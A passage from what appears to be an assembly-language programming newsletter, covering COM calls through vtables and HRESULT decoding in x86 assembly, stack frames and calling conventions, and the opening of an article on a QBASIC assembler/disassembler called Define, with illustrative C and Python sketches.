a virtual function table, or vtable for short.  This vtable contains the
addresses of each of the object's methods. To call a method, you call it
indirectly through this pointer table.

Here is an example of a C++ interface, and how its methods are called:

         interface IInterface
         {
              HRESULT QueryInterface( REFIID iid, void ** ppvObject );
              ULONG AddRef();
              ULONG Release();
              HRESULT Function1( INT param1, INT param2 );
              HRESULT Function2( INT param1 );
         };

         // calling the Function1 method
         pObject->Function1( 0, 0);

Now here is how the same functionality can be implemented using assembly
language:

         ; defining the interface
         ; each of these values are offsets in the vtable
         QueryInterface          equ             0h
         AddRef                  equ             4h
         Release                 equ             8h
         Function1               equ             0Ch
         Function2               equ             10h

         ; calling the Function1 method in asm
         ; the method is called by obtaining the address of the object's
         ; vtable and then calling the function addressed by the proper
         ; offset in the table
         push    param2
         push    param1
         mov     eax, pObject
         push    eax
         mov     eax, [eax]
         call    [eax + Function1]

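You can see this is somewhat different from calling a function normally.
Here, pObject points to the object, whose first DWORD holds the address of the
interface's vtable.  At the Function1 (0Ch) offset in this table is a pointer
to the actual function we wish to call.  Note that pObject itself is pushed
last, so the method receives it as its first ("this") argument.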
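
The double indirection is perhaps easiest to see when the object is modelled
in plain C. The sketch below is not real COM: the types Object and ObjectVtbl,
the demo_ functions and call_function1 are all invented for illustration, and
the method bodies do nothing useful. Only the layout (a vtable pointer as the
first field, one slot per method in declaration order) mirrors the text.

```c
#include <stdint.h>

typedef struct Object Object;

/* The vtable: one function pointer per method, in declaration order.
 * On a 32-bit target each slot is 4 bytes, giving offsets 0h..10h. */
typedef struct {
    int32_t  (*QueryInterface)(Object *self, const void *iid, void **out);
    uint32_t (*AddRef)(Object *self);
    uint32_t (*Release)(Object *self);
    int32_t  (*Function1)(Object *self, int param1, int param2);
    int32_t  (*Function2)(Object *self, int param1);
} ObjectVtbl;

struct Object {
    const ObjectVtbl *vtbl;  /* first field: what mov eax,[eax] fetches */
    uint32_t refs;
    int last_value;
};

/* Placeholder method bodies (hypothetical) */
static int32_t demo_query(Object *self, const void *iid, void **out)
{ (void)iid; *out = self; self->refs++; return 0; }
static uint32_t demo_addref(Object *self)  { return ++self->refs; }
static uint32_t demo_release(Object *self) { return --self->refs; }
static int32_t demo_function1(Object *self, int a, int b)
{ self->last_value = a + b; return 0; }
static int32_t demo_function2(Object *self, int a)
{ self->last_value = a; return 0; }

static const ObjectVtbl demo_vtbl = {
    demo_query, demo_addref, demo_release, demo_function1, demo_function2
};

void demo_init(Object *obj)
{
    obj->vtbl = &demo_vtbl;
    obj->refs = 1;
    obj->last_value = 0;
}

/* Same steps as the asm: fetch the vtable pointer from the object, fetch
 * the slot, and call it with the object itself as the first argument. */
int32_t call_function1(Object *pObject, int param1, int param2)
{
    const ObjectVtbl *vtbl = pObject->vtbl;           /* mov eax,[eax]          */
    return vtbl->Function1(pObject, param1, param2);  /* call [eax + Function1] */
}
```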



Using HRESULTs
-------------------------------------------------------------------------------

The return value of OLE APIs and methods is an HRESULT. This is not a handle
to anything, but is merely a 32-bit value with several fields encoded in the
value.  The parts of an HRESULT are shown below.

HRESULTs are 32-bit values laid out as follows:

  3 3 2 2 2 2 2 2 2 2 2 2 1 1 1 1 1 1 1 1 1 1
  1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0
+-+-+-+-+-+---------------------+-------------------------------+
|S|R|C|N|r|    Facility         |               Code            |
+-+-+-+-+-+---------------------+-------------------------------+

  S - Severity Bit
      Used to indicate success or failure
      0 - Success
      1 - Fail

      By noting that this bit is actually the sign bit of the 32-bit value,
      checking success/failure is simply performed by checking its sign:

      call       ComFunction        ; call the function
      test       eax,eax            ; now check its return value
      js         error              ; jump if signed (meaning error returned)
      ; success, so continue

  R - reserved portion of the facility code, corresponds to NT's
      second severity bit.

  C - reserved portion of the facility code, corresponds to NT's
      C field.

  N - reserved portion of the facility code. Used to indicate a
      mapped NT status value.

  r - reserved portion of the facility code. Reserved for internal
      use. Used to indicate HRESULT values that are not status
      values, but are instead message ids for display strings.

  Facility - is the facility code
      FACILITY_WINDOWS    = 8
      FACILITY_STORAGE    = 3
      FACILITY_RPC        = 1
      FACILITY_WIN32      = 7
      FACILITY_CONTROL    = 10
      FACILITY_NULL       = 0
      FACILITY_ITF        = 4
      FACILITY_DISPATCH   = 2

      To retrieve the Facility,

      call       ComFunction    ; call the function
      shr        eax, 16        ; shift the HRESULT to the right by 16 bits
      and        eax, 1FFFh     ; mask the bits, so only the facility remains
      ; eax now contains the HRESULT's Facility code

  Code - is the facility's status code

      To get the Facility's status code,
      call       ComFunction             ; call the function
      and        eax, 0000FFFFh          ; mask out the upper 16 bits
      ; eax now contains the HRESULT's Facility's status code
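
The three extractions above can be collected into small C helpers for
checking values by hand. The helper names are made up for this sketch; the
shifts and masks are the ones used in the assembly fragments.

```c
#include <stdint.h>

/* Severity: bit 31 set means failure (the js test in the asm) */
int hr_failed(uint32_t hr)
{
    return (hr >> 31) != 0;
}

/* Facility: shr eax,16 then and eax,1FFFh */
uint32_t hr_facility(uint32_t hr)
{
    return (hr >> 16) & 0x1FFFu;
}

/* Code: and eax,0000FFFFh */
uint32_t hr_code(uint32_t hr)
{
    return hr & 0xFFFFu;
}
```

For example, 80070005h (E_ACCESSDENIED) decodes as a failure with facility 7
(FACILITY_WIN32) and code 5, while 0 (S_OK) decodes as success.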



Using COM with MASM
------------------------------------------------------------------------------
If you use MASM to assemble your programs, you can use some of its
capabilities to make calling COM functions very easy.  Using invoke, you can
make COM calls look almost as clean as regular calls, plus you can add type
checking to each function.


Defining the interface:

      ; every method takes the interface pointer ("this") as its first argument
      IInterface_Function1Proto     typedef proto :DWORD, :DWORD, :DWORD
      IInterface_Function2Proto     typedef proto :DWORD, :DWORD

      IInterface_Function1          typedef ptr IInterface_Function1Proto
      IInterface_Function2          typedef ptr IInterface_Function2Proto

      ; the IUnknown_* types are assumed to be defined in the same way
      IInterface struct DWORD
            QueryInterface          IUnknown_QueryInterface         ?
            AddRef                  IUnknown_AddRef                 ?
            Release                 IUnknown_Release                ?
            Function1               IInterface_Function1            ?
            Function2               IInterface_Function2            ?
      IInterface ends

Using the interface to call COM functions:

      mov     edx, pObject                    ; edx = interface pointer ("this")
      mov     eax, [edx]                      ; eax = address of the vtable
      invoke  (IInterface ptr [eax]).Function1, edx, 0, 0

As you can see, the syntax may seem a bit strange, but it allows for a simple
method using the function name itself instead of offsets, as well as type
checking.



A Sample program written using COM
------------------------------------------------------------------------------

Here is some sample source code which uses COM written in straight assembly
language, so it should be compatible with any assembler you prefer with only
minor changes necessary.

This program uses the Windows Shell Interfaces to show the contents of the
Desktop folder in a window.  The program is not complete, but shows how the
COM library is initialized, de-initialized, and used. It also shows how the
shell library is used to get folders and objects, and how to perform
actions on them.


.386
.model flat, stdcall

include windows.inc             ; include the standard windows header
include shlobj.inc              ; this include file contains the shell namespace
                                 ; definitions and constants

;----------------------------------------------------------
.data
         wMsg                    MSG     <?>
         g_hInstance             dd      ?
         g_pShellMalloc          dd      ?

         pshf                    dd      ?       ; shell folder object
         peidl                   dd      ?       ; enum id list object

         lvi                     LV_ITEM <?>
         iCount                  dd      ?
         strret                  STRRET  <?>
         shfi                    SHFILEINFO <?>
         ...

;----------------------------------------------------------
.code
; Entry Point
start:
     push    0h
     call    GetModuleHandle
     mov     g_hInstance,eax

     call    InitCommonControls

; initialize the Component Object Model(COM) library
; this function must be called before any COM functions are called
     push    0
     call    CoInitialize
     test    eax,eax                         ; error when the MSB = 1
                                             ; (MSB = the sign bit)
     js      exit                            ; js = jump if signed

; Get the Shell's IMalloc object pointer, and save it to a global variable
     push    offset g_pShellMalloc
     call    SHGetMalloc
     cmp     eax, E_FAIL
     jz      shutdown


; here we would set up the windows, list view, message loop, and so on....
; we would also call the FillListView procedure...
; ....


; Cleanup
; Release IMalloc Object pointer
     mov     eax, g_pShellMalloc
     push    eax
     mov     eax, [eax]
     call    [eax + Release]         ; g_pShellMalloc->Release();

shutdown:
; close the COM library
     call    CoUninitialize

exit:
     push    wMsg.wParam
     call    ExitProcess
; Program Terminates Here


;----------------------------------------------------------
FillListView proc

; get the desktop shell folder, saved to pshf
     push    offset pshf
     call    SHGetDesktopFolder

; get the objects of the desktop folder using the EnumObjects method of
; the desktop's shell folder object
     push    offset peidl
     push    SHCONTF_NONFOLDERS
     push    0
     mov     eax, pshf
     push    eax
     mov     eax, [eax]
     call    [eax + EnumObjects]

; now loop through the enum id list
idlist_loop:
; Get next id list item
     push    0
     push    offset pidl
     push    1
     mov     eax, peidl
     push    eax
     mov     eax, [eax]
     call    [eax + Next]
     test    eax,eax
     jnz     idlist_endloop

     mov     lvi.imask, LVIF_TEXT or LVIF_IMAGE
     mov     lvi.iItem,

; Get the item's name by using the GetDisplayNameOf method
     push    offset strret
     push    SHGDN_NORMAL
     push    pidl                    ; the pidl itself, not its address
     mov     eax, pshf
     push    eax
     mov     eax, [eax]
     call    [eax + GetDisplayNameOf]
; GetDisplayNameOf returns the name in 1 of 3 forms, so get the correct
; form and act accordingly
     cmp     strret.uType, STRRET_CSTR
     je      strret_cstr
     cmp     strret.uType, STRRET_OFFSET
     je      strret_offset

strret_olestr:
     ; here you could use WideCharToMultiByte to get the string,
     ; I have left it out because I am lazy
     jmp     strret_end

strret_cstr:
     lea     eax, strret.cStr
     jmp     strret_end

strret_offset:
     mov     eax, pidl
     add     eax, strret.uOffset

strret_end:
     mov     lvi.pszText, eax

; Get the item's icon
     push    SHGFI_PIDL or SHGFI_SYSICONINDEX or SHGFI_SMALLICON or SHGFI_ICON
     push    sizeof SHFILEINFO
     push    offset shfi
     push    0
     push    pidl
     call    SHGetFileInfo
     mov     eax, shfi.iIcon
     mov     lvi.iImage, eax

; now add item to the list
     push    offset lvi
     push    0
     push    LVM_INSERTITEM
     push    hWndListView
     call    SendMessage

; repeat the loop
     jmp     idlist_loop

idlist_endloop:

; now free the enum id list
; Remember all allocated objects must be released...
     mov     eax, peidl
     push    eax
     mov     eax,[eax]
     call    [eax + Release]

; free the desktop shell folder object
     mov     eax, pshf
     push    eax
     mov     eax,[eax]
     call    [eax + Release]

     ret
FillListView endp


END start


Conclusion
-------------------------------------------------------------------------------

Well, that is about it for using COM with assembly language.  Hopefully, my
next article will go into how to define your own interfaces.  As you can
see, using COM is not difficult at all, and with it you can add a very
powerful capability to your assembly language programs.



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                Stack Frames and High-Level Calls
                                                by mammon_


Last month I covered how to implement high-level calls in Nasm. Since then it
has come to my attention that many beginning programmers are unfamiliar with
calling conventions and the stack frame; to remedy this I have prepared a brief
discussion of these topics.

The CALL Instruction
--------------------
At its most basic, an assembly language call takes this form:
	 push [parameters]
	 call [address]
Some assemblers will require that the CALL statement take as an argument only
addresses leading to external functions or addresses created with a macro or
directive such as PROC. However, as a quick glance through a debugger or a
passing familiarity with Nasm will demonstrate, the CALL instruction simply
jumps to an address [often a label in the source code] while pushing the
contents of EIP [containing the address of the instruction following the call]
onto the stack. The CALL instruction is therefore equivalent to the following
code:
	 push EIP
	 jmp  [address]

The address that has been called will therefore have the stack set up as follows:
	 [Last Parameter Pushed]: DWORD
	 [Address of Caller]    : DWORD
	 ---  "Top" of Stack [esp]  ---
At this point, anything pushed onto the stack will be on top of [that is, with a
lower memory address, since the stack "grows" downwards] the return address.

The Stack Frame
---------------
Note that the parameters to the call therefore cannot be POPed from the stack,
as this will destroy the saved return address and thus cause the application to
crash upon returning from the call [unless, of course, a chosen return address
is PUSHed onto the stack before returning from the call]. The logical way to
reference these parameters, then, would be as offsets from the stack pointer:
     [parameter 2]      : DWORD esp + 8
     [parameter 1]      : DWORD esp + 4
     [Address of Caller]: DWORD esp
     -----  "Top" of Stack [esp]  -----
In this example, "parameter 1" is the parameter pushed onto the stack last, and
"parameter 2" is the parameter pushed onto the stack before parameter 1, as
follows:
	 push [parameter 2]
	 push [parameter 1]
	 call [procedure]
The problem with referring to parameters as offsets from esp is that esp will
change whenever a value is PUSHed onto the stack during the routine. For this
reason, it is standard for routines which take parameters to set up a "stack
frame".

In a stack frame, the base pointer [ebp] is set equal to the stack pointer [esp]
at the start of the call; this provides a "base" address from which parameters
can be addressed as offsets. It is assumed that the caller had a stack frame
also; thus the value of ebp must be preserved in order to prevent causing damage
to the caller. The stack frame usually takes the following form:
	 push ebp
	 mov  ebp, esp
	 ... [actual code for the routine] ...
	 mov  esp, ebp
	 pop  ebp
This means that once the stack frame has been entered, the stack has the
following structure:
     [parameter 2]      : DWORD ebp + 12
     [parameter 1]      : DWORD ebp + 8
     [Address of Caller]: DWORD ebp + 4
     [Old Base Pointer] : DWORD ebp
     -----   Base Pointer [ebp]   -----
     -----  "Top" of Stack [esp]  -----
The use of the base pointer also allows space to  be allocated on the stack for
local variables. This is done by simply subtracting bytes from esp; since esp is
restored when the stack frame is exited, this space will automatically be
deallocated. The local variables are then referred to as *negative* offsets from
ebp; these may be EQUed to meaningful symbol names in the source code. A routine
that has 3 local DWORD variables would take the following form:
      Var1 EQU [ebp-4]
      Var2 EQU [ebp-8]
      Var3 EQU [ebp-12]  ;provide meaningful names for the variables
	 push ebp
	 mov  ebp, esp
	 sub  esp, 3*4    ;3 DWORDs at 4 BYTEs apiece
	 ... [actual code for the routine] ...
	 mov  esp, ebp
	 pop  ebp
This routine would then have the following stack structure after the allocation
of the local variables:
     [parameter 2]      : DWORD ebp + 12
     [parameter 1]      : DWORD ebp + 8
     [Address of Caller]: DWORD ebp + 4
     [Old Base Pointer] : DWORD ebp
     -----   Base Pointer [ebp]   -----
     [Var1]             : DWORD ebp - 4
     [Var2]             : DWORD ebp - 8
     [Var3]             : DWORD ebp - 12
     -----  "Top" of Stack [esp]  -----
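
To check these offsets without a debugger, the stack can be simulated in a
few lines of C. Everything in the sketch below (the Machine type, push, load,
call_with_frame) is invented for illustration; it only replays the sequence
push / push / call / push ebp / mov ebp,esp / sub esp,n on an array.

```c
#include <assert.h>
#include <stdint.h>

enum { STACK_BYTES = 256 };

typedef struct {
    uint32_t mem[STACK_BYTES / 4]; /* simulated stack, one DWORD per slot  */
    uint32_t esp;                  /* byte offset of the top of the stack  */
    uint32_t ebp;                  /* byte offset held in the base pointer */
} Machine;

void machine_reset(Machine *m, uint32_t callers_ebp)
{
    int i;

    for (i = 0; i < STACK_BYTES / 4; i++)
        m->mem[i] = 0;
    m->esp = STACK_BYTES;          /* empty stack: just past the last slot */
    m->ebp = callers_ebp;
}

void push(Machine *m, uint32_t value)
{
    assert(m->esp >= 4);
    m->esp -= 4;                   /* the stack grows downwards */
    m->mem[m->esp / 4] = value;
}

uint32_t load(const Machine *m, uint32_t address)
{
    assert(address < STACK_BYTES && address % 4 == 0);
    return m->mem[address / 4];
}

/* Replays a two-parameter call into a routine that builds a stack frame
 * and reserves local_bytes for local variables. */
void call_with_frame(Machine *m, uint32_t param1, uint32_t param2,
                     uint32_t return_address, uint32_t local_bytes)
{
    push(m, param2);               /* push [parameter 2]              */
    push(m, param1);               /* push [parameter 1]              */
    push(m, return_address);       /* call: pushes the return address */
    push(m, m->ebp);               /* push ebp                        */
    m->ebp = m->esp;               /* mov  ebp, esp                   */
    m->esp -= local_bytes;         /* sub  esp, local_bytes           */
}
```

After call_with_frame(&m, 11, 22, ret, 12), load(&m, m.ebp + 8) gives back 11
and load(&m, m.ebp + 12) gives back 22, while esp sits 12 bytes below ebp.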

The stack frame can also be used to provide a call trace, as it stores the
base pointer of [and thus a pointer to the caller of] the caller. Assume that a
program has the following flow of execution:
proc_1: push dword call1_p2
	 push dword call1_p1
	 call proc_2
________proc_2: push call2_p1
		 call proc_3
________________proc_3: push call3_p1
			 call proc_4
Upon creation of the stack frame in proc_4, the stack has the following
structure:
     [call1_p2]             : DWORD ebp + 36
     [call1_p1]             : DWORD ebp + 32
     [Return Addr of Call1] : DWORD ebp + 28
     [Old Base Pointer]     : DWORD ebp + 24
     ----  Base Pointer of Call 1  ----
     [call2_p1]             : DWORD ebp + 20
     [Return Addr of Call2] : DWORD ebp + 16
     [Base Pointer of Call1]: DWORD ebp + 12
     ----  Base Pointer of Call 2  ----
     [call3_p1]             : DWORD ebp + 8
     [Return Addr of Call3] : DWORD ebp + 4
     [Base Pointer of Call2]: DWORD ebp
     -----   Base Pointer [ebp]   -----
     -----  "Top" of Stack [esp]  -----
As you can see, for each previous call the return address is [ebp+4], where ebp
is the address of the saved base pointer for the call previous to that one.
Thus, one could traverse the history of stack frames as follows:
	 mov eax, ebp  ; eax = address of previous ebp
	 mov ecx, 10  ; trace the last 10 calls
loop_start:
	 mov ebx, [eax+4] ; ebx = return address for call
	 call print_stack_trace
	 mov eax, [eax]  ; step back one stack frame
	 loop loop_start
This is exceptionally useful for exception handling; the handling function will
be able to print out a stack history to aid debugging. This principle can also
be applied in conjunction with debugging code [for example, the Win32 debug API]
to create a utility which will trace the calls [in reality, the stack frames of
the calls] made by a target. Essentially, this would boil down to the following
logic:
	 1) Breakpoint on changes to EBP
	 2) On Break, get return address [ebp+4]
	 3) Get instruction prior to return address
	 4) Print or log the instruction
Note that this can be enhanced to resolve symbol names in the logged CALL
instruction, such that local or API address labels [e.g. GetWindowTextA] can be
logged rather than just the address itself.
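
The frame walk described earlier in this section can be modelled outside of
assembly. The following is a minimal Python sketch, not the author's code: the
dictionary "memory", the addresses in it, and the use of a zero saved EBP as an
end-of-chain marker are all assumptions made for illustration.

```python
def walk_frames(memory, ebp, max_frames=10):
    """Collect return addresses by following the chain of saved EBP values."""
    trace = []
    for _ in range(max_frames):
        # Stop at the assumed sentinel (0) or when the frame leaves the model.
        if ebp == 0 or ebp not in memory or ebp + 4 not in memory:
            break
        trace.append(memory[ebp + 4])   # mov ebx, [eax+4]
        ebp = memory[ebp]               # mov eax, [eax]
    return trace


# Toy stack image (address -> DWORD), laid out like the diagram in the text.
memory = {
    0x0FE0: 0x0FEC,    # [ebp]    saved EBP of the caller's frame
    0x0FE4: 0x401030,  # [ebp+4]  return address of call 3
    0x0FE8: 3,         # [ebp+8]  call3_p1
    0x0FEC: 0x0FF8,    # [ebp+12] saved EBP one frame further back
    0x0FF0: 0x401020,  # [ebp+16] return address of call 2
    0x0FF4: 2,         # [ebp+20] call2_p1
    0x0FF8: 0,         # [ebp+24] oldest saved EBP; 0 ends the chain here
    0x0FFC: 0x401010,  # [ebp+28] return address of call 1
}

for address in walk_frames(memory, 0x0FE0):
    print(hex(address))
```

Unlike the fixed ten-iteration assembly loop, the sketch stops when the chain
runs out, which a real tracer would also need to do in some form.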

The ENTER Instruction
---------------------
The ENTER instruction is used to create a stack frame with a single instruction;
with N bytes of local variables and a nesting level of 0, it is equivalent to
the code
	 push ebp
	 mov  ebp, esp
	 sub  esp, N
The ENTER instruction takes a first parameter that specifies the number of bytes
to reserve for local variables; a second parameter gives the nesting level
[0-31] of the current stack frame in the overall program structure. A nonzero
nesting level is used by block-structured high-level languages [Pascal, for
example] to reach the frames of enclosing procedures, as it specifies the number
of [previous] stack frame pointers to copy onto the stack.

The RET Instruction
-------------------
Any routine which is accessed by a CALL instruction must be terminated with a
return [RET] instruction. As one can see from the operation of the CALL
instruction, if you were to attempt to circumvent the RET instruction by JMPing
to the return address, the stack would still be corrupted. The RET statement is
roughly equivalent to the following code:
	 pop  EIP

Note that the RET must take place after exiting the stack frame in order to
avoid corruption of the stack.

The LEAVE Instruction
---------------------
The LEAVE instruction is used to exit a stack frame created with the ENTER
instruction; it is equivalent to the code
	 mov  esp, ebp
	 pop  ebp
The LEAVE instruction takes no parameters and still requires a RET statement to
follow it.
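
To make the effect of ENTER and LEAVE on ESP and EBP concrete, here is a small
Python model. It is a sketch only: the "regs" and "mem" dictionaries are
hypothetical stand-ins for the registers and the stack, and the nesting-level
handling follows the commonly documented behaviour of ENTER (push EBP, copy
level-1 older frame pointers, push the new frame pointer, reserve the locals).

```python
def push(mem, regs, value):
    """Model of PUSH: decrement ESP by 4 and store a DWORD."""
    regs["esp"] -= 4
    mem[regs["esp"]] = value


def enter(mem, regs, size, level=0):
    """Model of ENTER size, level."""
    level %= 32
    push(mem, regs, regs["ebp"])            # push ebp
    frame_temp = regs["esp"]
    if level > 0:
        for _ in range(1, level):           # copy older frame pointers
            regs["ebp"] -= 4
            push(mem, regs, mem[regs["ebp"]])
        push(mem, regs, frame_temp)         # pointer to the new frame itself
    regs["ebp"] = frame_temp                # mov ebp, esp (as it was after push)
    regs["esp"] -= size                     # sub esp, size


def leave(mem, regs):
    """Model of LEAVE: mov esp, ebp / pop ebp."""
    regs["esp"] = regs["ebp"]
    regs["ebp"] = mem[regs["esp"]]
    regs["esp"] += 4


mem, regs = {}, {"esp": 0x1000, "ebp": 0x2000}
enter(mem, regs, 8)        # 8 bytes of locals, nesting level 0
print(regs)                # frame is set up, ESP is below the locals
leave(mem, regs)
print(regs)                # both registers are back to their starting values
```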

High-level Language Calling Conventions
---------------------------------------
At this point one may wonder what has happened to the parameters pushed onto the
stack prior to the call. Are they still on the stack after the RET, or have they
been cleared? Since the parameters cannot be POPed from the stack while within
the call, they still are on the stack at the RET instruction.

At this point the programmer has two options.  They can have the caller clean up
the stack by adding the number of bytes pushed to esp immediately after the
call:
	 push dword param2
	 push dword param1
	 call procedure
	 add  esp, 2 * 4 	 ;2 DWORDs at 4 BYTEs apiece
Or they can clear the stack by passing to the RET instruction the number of
bytes that need to be cleared:
	 push dword param2
	 push dword param1
	 call procedure
	 ...
procedure:
	 push ebp
	 mov  ebp, esp
	 ...
	 mov  esp, ebp
	 pop  ebp
	 ret  8 		 ;2 DWORDs at 4 BYTEs apiece
Which method is chosen is left up to the programmer; however, when writing a
library or API, one must make clear who is responsible for cleaning up the
stack. In addition, when interfacing with high-level languages, one also has to
make clear which order the parameters are to be pushed in. For this reason there
are calling conventions for the high-level languages.

The C calling convention is used to interface with the C and C++ programming
languages; it is used in the standard C library and in Unix APIs. It pushes the
parameters from right to left, and the called routine does not clean up the
stack upon return; the caller does so after the call. A call to a C-style
routine would look as follows:
	 ;corresponds to the C code
	 ;procedure(param1, param2)
	 push dword param2
	 push dword param1
	 call procedure
	 add  esp, 8
A C-style routine would have the following structure:
	 push ebp
	 mov  ebp, esp
	 ...
	 mov  esp, ebp
	 pop  ebp
	 ret

The Pascal calling convention is used to interface with the Pascal, BASIC, and
Fortran programming languages; it is used in the Win16 API. It pushes the
parameters from left to right, and cleans up the stack upon return from the
call; as such it is the opposite of the C convention. A call to a Pascal routine
would look as follows:
	 ;corresponds to the C code
	 ;procedure(param1, param2)
	 push dword param1
	 push dword param2
	 call procedure
A Pascal-style routine would have the following structure:
	 push ebp
	 mov  ebp, esp
	 ...
	 mov  esp, ebp
	 pop  ebp
	 ret 8  ;clear the 2 dword parameters

The Stdcall ["standard call" or __stdcall] calling convention is a combination
of the C and Pascal conventions; it is used in the Win32 API. It pushes the
parameters from right to left, and cleans the stack upon return from the call. A
call to a Stdcall routine would look as follows:
	 ;corresponds to the C code
	 ;procedure(param1, param2)
	 push dword param2
	 push dword param1
	 call procedure
A Stdcall-style routine would have the following structure:
	 push ebp
	 mov  ebp, esp
	 ...
	 mov  esp, ebp
	 pop  ebp
	 ret 8
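
The three stack-based conventions above differ only in push order and in who
removes the parameters. The Python sketch below tabulates that and tracks ESP
through one call; the table, the function name and the starting ESP value are
illustrative assumptions, and every parameter is taken to be one DWORD.

```python
CONVENTIONS = {
    # name:     (push order,      who removes the parameters)
    "cdecl":   ("right-to-left", "caller"),
    "pascal":  ("left-to-right", "callee"),
    "stdcall": ("right-to-left", "callee"),
}


def simulate_call(convention, args, esp=0x1000):
    """Return (push order, ESP right after RET, ESP after caller cleanup)."""
    order, cleaner = CONVENTIONS[convention]
    pushed = list(args) if order == "left-to-right" else list(reversed(args))
    arg_bytes = 4 * len(pushed)

    esp -= arg_bytes          # the PUSH instructions
    esp -= 4                  # CALL pushes the return address
    esp += 4                  # RET pops the return address ...
    if cleaner == "callee":
        esp += arg_bytes      # ... and RET n also drops the parameters
    esp_after_ret = esp
    if cleaner == "caller":
        esp += arg_bytes      # ADD ESP, n in the caller
    return pushed, esp_after_ret, esp


for name in CONVENTIONS:
    print(name, simulate_call(name, ["param1", "param2"]))
```

In every case ESP ends where it started; only the moment at which the eight
parameter bytes disappear differs.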

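There is also a Register calling convention [also called "fastcall"] which uses
registers rather than the stack to pass parameters. In the variant shown here
[the one used by Watcom compilers] the first parameter is passed in EAX, the
second in EDX, and the third in EBX; subsequent parameters are passed via the
stack. Other compilers pick different registers: Borland's register convention
uses EAX, EDX and ECX, and Microsoft's __fastcall uses ECX and EDX. A call to a
Register routine would look as follows: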
	 ;corresponds to the C code
	 ;procedure(param1, param2, param3)
	 mov  eax, param1
	 mov  edx, param2
	 mov  ebx, param3
	 call procedure
Note that there is no defined standard method of clearing the stack for the
Register convention; however most implementations clear the stack in the Pascal
style.



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                              Define Your Memory
                                                              by Alan Baylis


[I am going to preface this article with a brief note, since it is not
  covering assembly language per se, but rather a utility that will be of use
  to asm coders. The author sums it up well in his original email to me:
   "Define is a new type of assembler/disassembler that does not use source
    code. The program reads the byte values in memory and checks a library to
    find a definition that describes the byte values it reads. The library can
    be added to and is used as a permanent macro list to write instructions,
    functions, etc to memory. Most assemblers also use standard 3 character
    mnemonics to describe the instruction set, however, with Define you can
    rename the instructions and your own macros to anything and up to 250
    characters."
  Sounds pretty promising.
   _m                    ]


For the x86 series of processors I have been working on a new type of assembler
and have written a program called Define. The program could be called a sketch
of what a future version might be like. The program is fully workable but
suffers from a few limitations: the first is that it is written in QBASIC, which
may be a blow to devoted machine coders; the second is that it can only
comfortably use about three hundred definitions (definitions are like a library
of machine code macros and I'll discuss them more fully later); and the third,
not a limit on its functionality, is that the program doesn't have a quick mouse
and menu driven interface, but I'm working on it.

I liked the idea of macros and saw the necessity for using them so that I and
others don't have to "reinvent the wheel", as it has been put, but I wanted a
way to see the machine code instructions and the byte values that made up the
macro. This can't be done through source code, as the finished code is generated
at the discretion of the compiler's authors and requires a debugger to verify
its content.

To make what was originally intended to be a debugger without the source code,
I decided to make a program that could read memory and interpret the byte values
it finds into their mnemonic equivalents or better (much like a debugger), so
that while reading memory, if the program found the byte value 205 followed by
the value 5, it would display "INT 5". To do this I needed what I termed a
'definition', which included the byte values that make up an instruction or
small macro together with a description or name for the function they perform.

Unlike what I had done with a previous assembler, I decided to put the
definitions in a separate file rather than include them as data within the main
program; this allowed for the addition or removal of future definitions. I then
quickly realised that since these definitions contained the byte values of an
instruction, they could also be used to write the bytes into memory. I added
functions to save and load programs as well as functions to manipulate the
definition file, and the program was underway.

I found while writing the definitions for the instruction set that it would be
good (and necessary) if the program could read an instruction even if one of the
bytes is unknown or variable; I decided to call these bytes undefined bytes, so
that if the program found the number 205 it would display something like
"Interrupt call" regardless of what number followed.
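
The idea of definitions with undefined bytes can be sketched in a few lines of
Python. This is not Define's actual file format or matching algorithm, which
the article does not show; the list layout, the use of None for an undefined
byte, and the first-match-wins rule are assumptions for illustration.

```python
# Each definition: (byte pattern, name). None marks an undefined byte.
DEFINITIONS = [
    ((0xCD, 0x05), "INT 5"),            # 205 followed by 5
    ((0xCD, None), "Interrupt call"),   # 205 followed by anything
    ((0x90,), "NOP"),
]


def describe(memory):
    """Turn a run of bytes into a list of definition names."""
    out, pos = [], 0
    while pos < len(memory):
        for pattern, name in DEFINITIONS:
            chunk = memory[pos:pos + len(pattern)]
            if len(chunk) == len(pattern) and all(
                p is None or p == b for p, b in zip(pattern, chunk)
            ):
                out.append(name)
                pos += len(pattern)
                break
        else:
            # No definition fits: show the raw byte value instead.
            out.append(f"DB {memory[pos]}")
            pos += 1
    return out


print(describe(bytes([0xCD, 0x05, 0xCD, 0x21, 0x90, 0x07])))
```

Because the more specific "INT 5" entry is listed first, it wins over the
generic "Interrupt call" entry for the same leading byte.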

While reading memory I also wanted a way to exclude data areas from being
interpreted into definitions, so I added a new definition type called addresses,
which contain the address of the first and last bytes of a data area and a name
to describe the data area. If these are turned on in the program then they are
used instead of the normal definitions when reading that part of memory.

To then take Define closer to being an assembler rather than a debugger I also
included labels that label memory addresses and the destination of jump and
branch instructions.

I envision that a future version of Define, written in machine code, or a
similar program will have a pop up list of definitions and use a point and click
method of writing the code as opposed to the current method of scrolling through
them from a different page. The future version will also need to be able to
handle thousands of definitions as opposed to the few hundred it can use at a
time now, in order to accommodate situations such as the following:

To call interrupt 21h function 9, which prints a string, it is necessary to put
the function number 9 in AH and the address of the string in the registers DS:DX
and then call the interrupt,

MOV AH,9
MOV DX,address
INT 21h

however it is also valid to put the number 9 in AH after the address of the
string has been put in DS:DX,

MOV DX,address
MOV AH,9
INT 21h

To make a definition for this interrupt at least two definitions will need to be
made, and therefore a larger definition file. This also doesn't account for the
situation in which the number 9 may have been loaded into AH three instructions
earlier and is assumed to be correct at the time when the interrupt is called;
in this case only the definitions for the instructions will be seen and not a
definition for the interrupt.
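
The two orderings can be written out as byte patterns to show why one
high-level definition becomes two entries. The Python sketch below assumes the
usual 16-bit encodings (B4 ib for MOV AH, BA iw for MOV DX, CD ib for INT) and
uses None for the two address bytes; the names are hypothetical and this is not
Define's own format.

```python
WILD = None  # an undefined byte: any value matches

PRINT_STRING_PATTERNS = [
    (0xB4, 0x09, 0xBA, WILD, WILD, 0xCD, 0x21),  # MOV AH,9 / MOV DX,addr / INT 21h
    (0xBA, WILD, WILD, 0xB4, 0x09, 0xCD, 0x21),  # MOV DX,addr / MOV AH,9 / INT 21h
]


def matches(pattern, code, pos=0):
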